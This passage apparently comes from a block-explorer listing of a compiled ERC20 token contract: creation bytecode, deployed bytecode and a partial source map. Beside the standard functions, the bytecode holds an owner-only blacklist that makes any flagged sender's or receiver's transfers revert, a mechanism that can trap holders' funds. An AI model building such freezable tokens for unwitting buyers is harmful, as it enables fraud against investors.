5b8381101561103657808201518184015260208101905061101b565b60008484015250505050565b6000601f19601f8301169050919050565b600061105e82610ffc565b6110688185611007565b9350611078818560208601611018565b61108181611042565b840191505092915050565b600060208201905081810360008301526110a68184611053565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110de826110b3565b9050919050565b6110ee816110d3565b81146110f957600080fd5b50565b60008135905061110b816110e5565b92915050565b6000819050919050565b61112481611111565b811461112f57600080fd5b50565b6000813590506111418161111b565b92915050565b6000806040838503121561115e5761115d6110ae565b5b600061116c858286016110fc565b925050602061117d85828601611132565b9150509250929050565b60008115159050919050565b61119c81611187565b82525050565b60006020820190506111b76000830184611193565b92915050565b6111c681611187565b81146111d157600080fd5b50565b6000813590506111e3816111bd565b92915050565b60008060408385031215611200576111ff6110ae565b5b600061120e858286016110fc565b925050602061121f858286016111d4565b9150509250929050565b61123281611111565b82525050565b600060208201905061124d6000830184611229565b92915050565b60008060006060848603121561126c5761126b6110ae565b5b600061127a868287016110fc565b935050602061128b868287016110fc565b925050604061129c86828701611132565b9150509250925092565b600060ff82169050919050565b6112bc816112a6565b82525050565b60006020820190506112d760008301846112b3565b92915050565b6000602082840312156112f3576112f26110ae565b5b6000611301848285016110fc565b91505092915050565b611313816110d3565b82525050565b600060208201905061132e600083018461130a565b92915050565b6000806040838503121561134b5761134a6110ae565b5b6000611359858286016110fc565b925050602061136a858286016110fc565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806113bb57607f821691505b6020821081036113ce576113cd611374565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061140a602083611007565b9150611415826113d4565b602082019050919050565b60006020820190508181036000830152611439816113fd565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061147a82611111565b915061148583611111565b925082820190508082111561149d5761149c611440565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006114ff602583611007565b915061150a826114a3565b604082019050919050565b6000602082019050818103600083015261152e816114f2565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611591602683611007565b915061159c82611535565b604082019050919050565b600060208201905081810360008301526115c081611584565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611623602483611007565b915061162e826115c7565b604082019050919050565b6000602082019050818103600083015261165281611616565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006116b5602283611007565b91506116c082611659565b604082019050919050565b600060208201905081810360008301526116e4816116a8565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611721601d83611007565b915061172c826116eb565b602082019050919050565b6000602082019050818103600083015261175081611714565b9050919050565b7f53656e6465722e00000000000000000000000000000000000000000000000000600082015250565b600061178d600783611007565b915061179882611757565b602082019050919050565b600060208201905081810360008301526117bc81611780565b9050919050565b7f52656365697665722e0000000000000000000000000000000000000000000000600082015250565b60006117f9600983611007565b9150611804826117c3565b602082019050919050565b60006020820190508181036000830152611828816117ec565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061188b602583611007565b91506118968261182f565b604082019050919050565b600060208201905081810360008301526118ba8161187e565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061191d602383611007565b9150611928826118c1565b604082019050919050565b6000602082019050818103600083015261194c81611910565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119af602683611007565b91506119ba82611953565b604082019050919050565b600060208201905081810360008301526119de816119a2565b905091905056fea26469706673582212209f0ef6547fbbf2d6194b782811487bef3656a9ecff28c26517afe81b4243cd5a64736f6c63430008120033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d7146102b1578063a9059cbb146102e1578063dd62ed3e14610311578063f2fde38b1461034157610100565b8063715018a61461023b5780638da5cb5b1461024557806395d89b411461026357806396bfcd231461028157610100565b806323b872dd116100d357806323b872dd1461018d578063313ce567146101bd57806339509351146101db57806370a082311461020b57610100565b806306fdde0314610105578063095ea7b3146101235780630d17ed711461015357806318160ddd1461016f575b600080fd5b61010d61035d565b60405161011a919061108c565b60405180910390f35b61013d60048036038101906101389190611147565b6103ef565b60405161014a91906111a2565b60405180910390f35b61016d600480360381019061016891906111e9565b610412565b005b6101776104e9565b6040516101849190611238565b60405180910390f35b6101a760048036038101906101a29190611253565b6104f3565b6040516101b491906111a2565b60405180910390f35b6101c5610522565b6040516101d291906112c2565b60405180910390f35b6101f560048036038101906101f09190611147565b61052b565b60405161020291906111a2565b60405180910390f35b610225600480360381019061022091906112dd565b610562565b6040516102329190611238565b60405180910390f35b6102436105aa565b005b61024d610632565b60405161025a9190611319565b60405180910390f35b61026b61065c565b604051610278919061108c565b60405180910390f35b61029b600480360381019061029691906112dd565b6106ee565b6040516102a891906111a2565b60405180910390f35b6102cb60048036038101906102c69190611147565b61070e565b6040516102d891906111a2565b60405180910390f35b6102fb60048036038101906102f69190611147565b610785565b60405161030891906111a2565b60405180910390f35b61032b60048036038101906103269190611334565b6107a8565b6040516103389190611238565b60405180910390f35b61035b600480360381019061035691906112dd565b61082f565b005b60606003805461036c906113a3565b80601f0160208091040260200160405190810160405280929190818152602001828054610398906113a3565b80156103e55780601f106103ba576101008083540402835291602001916103e5565b820191906000526020600020905b8154815290600101906020018083116103c857829003601f168201915b5050505050905090565b6000806103fa610926565b905061040781858561092e565b600191505092915050565b61041a610926565b73ffffffffffffffffffffffffffffffffffffffff16610438610632565b73ffffffffffffffffffffffffffffffffffffffff161461048e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161048590611420565b60405180910390fd5b80600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b6000600254905090565b6000806104fe610926565b905061050b858285610af7565b610516858585610b83565b60019150509392505050565b60006012905090565b600080610536610926565b905061055781858561054885896107a8565b610552919061146f565b61092e565b600191505092915050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105b2610926565b73ffffffffffffffffffffffffffffffffffffffff166105d0610632565b73ffffffffffffffffffffffffffffffffffffffff1614610626576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161061d90611420565b60405180910390fd5b6106306000610cad565b565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606004805461066b906113a3565b80601f0160208091040260200160405190810160405280929190818152602001828054610697906113a3565b80156106e45780601f106106b9576101008083540402835291602001916106e4565b820191906000526020600020905b8154815290600101906020018083116106c757829003601f168201915b5050505050905090565b60066020528060005260406000206000915054906101000a900460ff1681565b600080610719610926565b9050600061072782866107a8565b90508381101561076c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161076390611515565b60405180910390fd5b610779828686840361092e565b60019250505092915050565b600080610790610926565b905061079d818585610b83565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610837610926565b73ffffffffffffffffffffffffffffffffffffffff16610855610632565b73ffffffffffffffffffffffffffffffffffffffff16146108ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108a290611420565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361091a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610911906115a7565b60405180910390fd5b61092381610cad565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361099d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161099490611639565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a0c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a03906116cb565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610aea9190611238565b60405180910390a3505050565b6000610b0384846107a8565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b7d5781811015610b6f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6690611737565b60405180910390fd5b610b7c848484840361092e565b5b50505050565b600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610c10576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c07906117a3565b60405180910390fd5b600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610c9d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c949061180f565b60405180910390fd5b610ca8838383610d73565b505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610de2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd9906118a1565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e51576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e4890611933565b60405180910390fd5b610e5c838383610ff2565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610ee2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ed9906119c5565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610f75919061146f565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610fd99190611238565b60405180910390a3610fec848484610ff7565b50505050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561103657808201518184015260208101905061101b565b60008484015250505050565b6000601f19601f8301169050919050565b600061105e82610ffc565b6110688185611007565b9350611078818560208601611018565b61108181611042565b840191505092915050565b600060208201905081810360008301526110a68184611053565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110de826110b3565b9050919050565b6110ee816110d3565b81146110f957600080fd5b50565b60008135905061110b816110e5565b92915050565b6000819050919050565b61112481611111565b811461112f57600080fd5b50565b6000813590506111418161111b565b92915050565b6000806040838503121561115e5761115d6110ae565b5b600061116c858286016110fc565b925050602061117d85828601611132565b9150509250929050565b60008115159050919050565b61119c81611187565b82525050565b60006020820190506111b76000830184611193565b92915050565b6111c681611187565b81146111d157600080fd5b50565b6000813590506111e3816111bd565b92915050565b60008060408385031215611200576111ff6110ae565b5b600061120e858286016110fc565b925050602061121f858286016111d4565b9150509250929050565b61123281611111565b82525050565b600060208201905061124d6000830184611229565b92915050565b60008060006060848603121561126c5761126b6110ae565b5b600061127a868287016110fc565b935050602061128b868287016110fc565b925050604061129c86828701611132565b9150509250925092565b600060ff82169050919050565b6112bc816112a6565b82525050565b60006020820190506112d760008301846112b3565b92915050565b6000602082840312156112f3576112f26110ae565b5b6000611301848285016110fc565b91505092915050565b611313816110d3565b82525050565b600060208201905061132e600083018461130a565b92915050565b6000806040838503121561134b5761134a6110ae565b5b6000611359858286016110fc565b925050602061136a858286016110fc565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806113bb57607f821691505b6020821081036113ce576113cd611374565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061140a602083611007565b9150611415826113d4565b602082019050919050565b60006020820190508181036000830152611439816113fd565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061147a82611111565b915061148583611111565b925082820190508082111561149d5761149c611440565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006114ff602583611007565b915061150a826114a3565b604082019050919050565b6000602082019050818103600083015261152e816114f2565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611591602683611007565b915061159c82611535565b604082019050919050565b600060208201905081810360008301526115c081611584565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611623602483611007565b915061162e826115c7565b604082019050919050565b6000602082019050818103600083015261165281611616565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006116b5602283611007565b91506116c082611659565b604082019050919050565b600060208201905081810360008301526116e4816116a8565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611721601d83611007565b915061172c826116eb565b602082019050919050565b6000602082019050818103600083015261175081611714565b9050919050565b7f53656e6465722e00000000000000000000000000000000000000000000000000600082015250565b600061178d600783611007565b915061179882611757565b602082019050919050565b600060208201905081810360008301526117bc81611780565b9050919050565b7f52656365697665722e0000000000000000000000000000000000000000000000600082015250565b60006117f9600983611007565b9150611804826117c3565b602082019050919050565b60006020820190508181036000830152611828816117ec565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061188b602583611007565b91506118968261182f565b604082019050919050565b600060208201905081810360008301526118ba8161187e565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061191d602383611007565b9150611928826118c1565b604082019050919050565b6000602082019050818103600083015261194c81611910565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119af602683611007565b91506119ba82611953565b604082019050919050565b600060208201905081810360008301526119de816119a2565b905091905056fea26469706673582212209f0ef6547fbbf2d6194b782811487bef3656a9ecff28c26517afe81b4243cd5a64736f6c63430008120033

Deployed Bytecode Sourcemap

144:619:1:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2196:100:2;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4688:242;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;656:104:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3316:108:2;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5510:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3158:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6214:270;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3487:177;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1739:103:5;;;:::i;:::-;;1088:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2415:104:2;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;189:39:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6987:505:2;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3870:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4167:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1997:238:5;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2196:100:2;2250:13;2283:5;2276:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2196:100;:::o;4688:242::-;4807:4;4829:13;4845:12;:10;:12::i;:::-;4829:28;;4868:32;4877:5;4884:7;4893:6;4868:8;:32::i;:::-;4918:4;4911:11;;;4688:242;;;;:::o;656:104:1:-;1319:12:5;:10;:12::i;:::-;1308:23;;:7;:5;:7::i;:::-;:23;;;1300:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;746:6:1::1;729:7;:14;737:5;729:14;;;;;;;;;;;;;;;;:23;;;;;;;;;;;;;;;;;;656:104:::0;;:::o;3316:108:2:-;3377:7;3404:12;;3397:19;;3316:108;:::o;5510:295::-;5641:4;5658:15;5676:12;:10;:12::i;:::-;5658:30;;5699:38;5715:4;5721:7;5730:6;5699:15;:38::i;:::-;5748:27;5758:4;5764:2;5768:6;5748:9;:27::i;:::-;5793:4;5786:11;;;5510:295;;;;;:::o;3158:93::-;3216:5;3241:2;3234:9;;3158:93;:::o;6214:270::-;6329:4;6351:13;6367:12;:10;:12::i;:::-;6351:28;;6390:64;6399:5;6406:7;6443:10;6415:25;6425:5;6432:7;6415:9;:25::i;:::-;:38;;;;:::i;:::-;6390:8;:64::i;:::-;6472:4;6465:11;;;6214:270;;;;:::o;3487:177::-;3606:7;3638:9;:18;3648:7;3638:18;;;;;;;;;;;;;;;;3631:25;;3487:177;;;:::o;1739:103:5:-;1319:12;:10;:12::i;:::-;1308:23;;:7;:5;:7::i;:::-;:23;;;1300:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1804:30:::1;1831:1;1804:18;:30::i;:::-;1739:103::o:0;1088:87::-;1134:7;1161:6;;;;;;;;;;;1154:13;;1088:87;:::o;2415:104:2:-;2471:13;2504:7;2497:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2415:104;:::o;189:39:1:-;;;;;;;;;;;;;;;;;;;;;;:::o;6987:505:2:-;7107:4;7129:13;7145:12;:10;:12::i;:::-;7129:28;;7168:24;7195:25;7205:5;7212:7;7195:9;:25::i;:::-;7168:52;;7273:15;7253:16;:35;;7231:122;;;;;;;;;;;;:::i;:::-;;;;;;;;;7389:60;7398:5;7405:7;7433:15;7414:16;:34;7389:8;:60::i;:::-;7480:4;7473:11;;;;6987:505;;;;:::o;3870:234::-;3985:4;4007:13;4023:12;:10;:12::i;:::-;4007:28;;4046;4056:5;4063:2;4067:6;4046:9;:28::i;:::-;4092:4;4085:11;;;3870:234;;;;:::o;4167:201::-;4301:7;4333:11;:18;4345:5;4333:18;;;;;;;;;;;;;;;:27;4352:7;4333:27;;;;;;;;;;;;;;;;4326:34;;4167:201;;;;:::o;1997:238:5:-;1319:12;:10;:12::i;:::-;1308:23;;:7;:5;:7::i;:::-;:23;;;1300:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2120:1:::1;2100:22;;:8;:22;;::::0;2078:110:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2199:28;2218:8;2199:18;:28::i;:::-;1997:238:::0;:::o;656:98:0:-;709:7;736:10;729:17;;656:98;:::o;10727:380:2:-;10880:1;10863:19;;:5;:19;;;10855:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10961:1;10942:21;;:7;:21;;;10934:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11045:6;11015:11;:18;11027:5;11015:18;;;;;;;;;;;;;;;:27;11034:7;11015:27;;;;;;;;;;;;;;;:36;;;;11083:7;11067:32;;11076:5;11067:32;;;11092:6;11067:32;;;;;;:::i;:::-;;;;;;;;10727:380;;;:::o;11398:502::-;11533:24;11560:25;11570:5;11577:7;11560:9;:25::i;:::-;11533:52;;11620:17;11600:16;:37;11596:297;;11700:6;11680:16;:26;;11654:117;;;;;;;;;;;;:::i;:::-;;;;;;;;;11815:51;11824:5;11831:7;11859:6;11840:16;:25;11815:8;:51::i;:::-;11596:297;11522:378;11398:502;;;:::o;391:257:1:-;525:7;:13;533:4;525:13;;;;;;;;;;;;;;;;;;;;;;;;;523:15;515:35;;;;;;;;;;;;:::i;:::-;;;;;;;;;571:7;:11;579:2;571:11;;;;;;;;;;;;;;;;;;;;;;;;;569:13;561:35;;;;;;;;;;;;:::i;:::-;;;;;;;;;607:33;623:4;629:2;633:6;607:15;:33::i;:::-;391:257;;;:::o;2395:191:5:-;2469:16;2488:6;;;;;;;;;;;2469:25;;2514:8;2505:6;;:17;;;;;;;;;;;;;;;;;;2569:8;2538:40;;2559:8;2538:40;;;;;;;;;;;;2458:128;2395:191;:::o;7971:708:2:-;8118:1;8102:18;;:4;:18;;;8094:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;8195:1;8181:16;;:2;:16;;;8173:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;8250:38;8271:4;8277:2;8281:6;8250:20;:38::i;:::-;8301:19;8323:9;:15;8333:4;8323:15;;;;;;;;;;;;;;;;8301:37;;8386:6;8371:11;:21;;8349:109;;;;;;;;;;;;:::i;:::-;;;;;;;;;8526:6;8512:11;:20;8494:9;:15;8504:4;8494:15;;;;;;;;;;;;;;;:38;;;;8571:6;8554:9;:13;8564:2;8554:13;;;;;;;;;;;;;;;;:23;;;;;;;:::i;:::-;;;;;;;;8610:2;8595:26;;8604:4;8595:26;;;8614:6;8595:26;;;;;;:::i;:::-;;;;;;;;8634:37;8654:4;8660:2;8664:6;8634:19;:37::i;:::-;8083:596;7971:708;;;:::o;12500:125::-;;;;:::o;13229:124::-;;;;:::o;7:99:6:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:116::-;3516:21;3531:5;3516:21;:::i;:::-;3509:5;3506:32;3496:60;;3552:1;3549;3542:12;3496:60;3446:116;:::o;3568:133::-;3611:5;3649:6;3636:20;3627:29;;3665:30;3689:5;3665:30;:::i;:::-;3568:133;;;;:::o;3707:468::-;3772:6;3780;3829:2;3817:9;3808:7;3804:23;3800:32;3797:119;;;3835:79;;:::i;:::-;3797:119;3955:1;3980:53;4025:7;4016:6;4005:9;4001:22;3980:53;:::i;:::-;3970:63;;3926:117;4082:2;4108:50;4150:7;4141:6;4130:9;4126:22;4108:50;:::i;:::-;4098:60;;4053:115;3707:468;;;;;:::o;4181:118::-;4268:24;4286:5;4268:24;:::i;:::-;4263:3;4256:37;4181:118;;:::o;4305:222::-;4398:4;4436:2;4425:9;4421:18;4413:26;;4449:71;4517:1;4506:9;4502:17;4493:6;4449:71;:::i;:::-;4305:222;;;;:::o;4533:619::-;4610:6;4618;4626;4675:2;4663:9;4654:7;4650:23;4646:32;4643:119;;;4681:79;;:::i;:::-;4643:119;4801:1;4826:53;4871:7;4862:6;4851:9;4847:22;4826:53;:::i;:::-;4816:63;;4772:117;4928:2;4954:53;4999:7;4990:6;4979:9;4975:22;4954:53;:::i;:::-;4944:63;;4899:118;5056:2;5082:53;5127:7;5118:6;5107:9;5103:22;5082:53;:::i;:::-;5072:63;;5027:118;4533:619;;;;;:::o;5158:86::-;5193:7;5233:4;5226:5;5222:16;5211:27;;5158:86;;;:::o;5250:112::-;5333:22;5349:5;5333:22;:::i;:::-;5328:3;5321:35;5250:112;;:::o;5368:214::-;5457:4;5495:2;5484:9;5480:18;5472:26;;5508:67;5572:1;5561:9;5557:17;5548:6;5508:67;:::i;:::-;5368:214;;;;:::o;5588:329::-;5647:6;5696:2;5684:9;5675:7;5671:23;5667:32;5664:119;;;5702:79;;:::i;:::-;5664:119;5822:1;5847:53;5892:7;5883:6;5872:9;5868:22;5847:53;:::i;:::-;5837:63;;5793:117;5588:329;;;;:::o;5923:118::-;6010:24;6028:5;6010:24;:::i;:::-;6005:3;5998:37;5923:118;;:::o;6047:222::-;6140:4;6178:2;6167:9;6163:18;6155:26;;6191:71;6259:1;6248:9;6244:17;6235:6;6191:71;:::i;:::-;6047:222;;;;:::o;6275:474::-;6343:6;6351;6400:2;6388:9;6379:7;6375:23;6371:32;6368:119;;;6406:79;;:::i;:::-;6368:119;6526:1;6551:53;6596:7;6587:6;6576:9;6572:22;6551:53;:::i;:::-;6541:63;;6497:117;6653:2;6679:53;6724:7;6715:6;6704:9;6700:22;6679:53;:::i;:::-;6669:63;;6624:118;6275:474;;;;;:::o;6755:180::-;6803:77;6800:1;6793:88;6900:4;6897:1;6890:15;6924:4;6921:1;6914:15;6941:320;6985:6;7022:1;7016:4;7012:12;7002:22;;7069:1;7063:4;7059:12;7090:18;7080:81;;7146:4;7138:6;7134:17;7124:27;;7080:81;7208:2;7200:6;7197:14;7177:18;7174:38;7171:84;;7227:18;;:::i;:::-;7171:84;6992:269;6941:320;;;:::o;7267:182::-;7407:34;7403:1;7395:6;7391:14;7384:58;7267:182;:::o;7455:366::-;7597:3;7618:67;7682:2;7677:3;7618:67;:::i;:::-;7611:74;;7694:93;7783:3;7694:93;:::i;:::-;7812:2;7807:3;7803:12;7796:19;;7455:366;;;:::o;7827:419::-;7993:4;8031:2;8020:9;8016:18;8008:26;;8080:9;8074:4;8070:20;8066:1;8055:9;8051:17;8044:47;8108:131;8234:4;8108:131;:::i;:::-;8100:139;;7827:419;;;:::o;8252:180::-;8300:77;8297:1;8290:88;8397:4;8394:1;8387:15;8421:4;8418:1;8411:15;8438:191;8478:3;8497:20;8515:1;8497:20;:::i;:::-;8492:25;;8531:20;8549:1;8531:20;:::i;:::-;8526:25;;8574:1;8571;8567:9;8560:16;;8595:3;8592:1;8589:10;8586:36;;;8602:18;;:::i;:::-;8586:36;8438:191;;;;:::o;8635:224::-;8775:34